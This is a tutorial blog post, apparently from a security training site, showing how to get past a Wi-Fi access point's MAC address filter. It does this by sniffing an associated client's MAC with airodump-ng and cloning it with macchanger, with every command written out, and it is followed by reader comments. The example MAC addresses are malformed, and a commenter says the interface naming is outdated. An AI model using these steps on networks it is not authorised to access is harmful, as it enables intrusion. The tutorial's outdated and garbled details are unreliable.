Ethical Hacking with Kali Linux – Part 3: Bypassing the MAC Address Filter

April 1, 2016 | Views: 23270

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Ethical Hacking with Kali Linux – Part 3: Bypassing the MAC Address Filter

>> Welcome all, to this series of Kali Linux for Ethical Hacking. This is third part and I’ll explain process of bypassing the MAC Address Filter on an AP (Access Point).

 

# 3 Basic Process:

– Finding the AP: airmon-ng & airodump-ng

– Finding an associated client: airodump-ng

– Finally, using the MACchanger

 

# . . . Let’s Begin

– Before starting, make sure that you have eth0, lo, wlan0 in action. (Go to terminal and run ifconfig.)

– Let’s start to monitor on the wireless interface. Run:

airmon-ng start wlan0

– After executing above command, we must get new interface mon0 (Monitor mode enabled.)

– Verify that both interfaces are up and running, run:

airmon-ng

– Watch for wlan0 and mon0, run:

airodump-ng mon0

– For monitoring all the APs that Kali Linux OS can find out.

– In the next step, you’ll get BSSID and ESSID, channel, cipher. If there’s any hidden SSID, then ESSID will be formatted like this: <length: 0> or with no SSID.

Note: We saw in second part how to uncover this hidden SSID. But, here you can use any SSID with Open Encryption, or SSID with known password.

– We will use the MAC address that was seen in part 2. i.e. 00:A1:B2:11:20:13:5T and channel ‘1’ (Assume the MAC address filter is done in this system. Let’s suppose it’s SSID is nhc-BJ.)

– Now, we try to find out the client and his MAC associated with this AP (nhc-BJ).

– So we can use that MAC to bypass filter, run:

airodump-ng -c 1 -a –bssid 00:A1:B2:11:20:13:5T mon0

(-c is for channel, channel is 1 for BSSID; we’re are trying to connect. -a is for showing only the client associated with this BSSID.)

– You’ll get the MAC address with the station associated with that AP, and this is the client’s station. (Let’s assume Mac = 00:C1:52:11:20:13:7D).

– CTRL+C (press)

– Run:

macchanger –help
(notice, -m for setting mac)

-Run:

macchanger -m 00:C1:52:11:20:13:7D wlan0

(If the device or resource busy, then run following command:)

airmon-ng stop wlan0

– Run:

macchanger -m 00:C1:52:11:20:13:7D wlan0

(If successful, you’ll see a message like ‘faked MAC’)

-Run:

ifconfig wlan0 down

ifconfig wlan0 up

(Let’s see whether we can associate with the SSID now or not with this faked MAC)

– Run:

iwconfig wlan0 essid nhc-BJ channel 1

(If not, run in Kali and run it in BackTrack. Or, see the updated version of Kali.)

iwconfig wlan0

(If successful, the Access Point will be associated.)

 

A quick note: This series is only for educational purpose. Practice this series in a lab, in a virtual/separate network and always avoid illegal activities. If you can, then support us in fighting the bad guys.

See the other posts in this series:

Ethical Hacking with Kali Linux – Part 1: Objective
Ethical Hacking with Kali Linux – Part 2: Finding Hidden SSIDS
Ethical Hacking with Kali Linux – Part 4: Breaking WPA2 Wireless
Ethical Hacking with Kali Linux – Part5: Rogue Wireless Access Points
Ethical Hacking with Kali Linux – Part 6: Nmap (Network Mapper)


By: BIJAY ACHARYA  (twitter : @acharya_bijay)

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
11 Comments
  1. I found this “issue” interesting when using airmon-ng for Kali 2.0

    http://stackoverflow.com/questions/32025472/airodump-ng-wlan0mon-doesnt-work

  2. Would be very interested in the update to the question by Muckvanity.

    bj achary

    A well written article and my thanks for your time and considerable effort in producing the series.

    Mightyhash

  3. mon0? Is this a cut and paste job?

    I think you may be doing those who don’t know this stuff a great disservice by posting outdated information.

    As I see it you have “created” this write-up within the last 2 months. mon0 mon1 etc, have not been used in (b)airmon-ng(/b) for over a year. Instead wlan0mon wlan1mon and so on are used to represent monitor mode.

    Please tell me if I’m wrong here for some reason… I’m often called an asshole for pointing stuff like this out but in my opinion I’d be a bigger asshole did I not let the author know, along with any of his readers I may reach, that there are some much better, far more current tutorials on this subject matter on this site… https://www.cybrary.it/video/wireless-intro/

    Now please don’t walk away thinking your are stupid or have done anything wrong. You have obviously worked very hard on what is a fantastic piece of work. It would have a better chance of earning a gold star however, and would be better shown off to others, if it affixed to your fridge with a magnet rather than published as a tutorial at a place where people come to learn things.

  4. can I add you on facebook?? please provide me your facebook id

  5. Can u do this process in windows…..

Page 1 of 212»
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel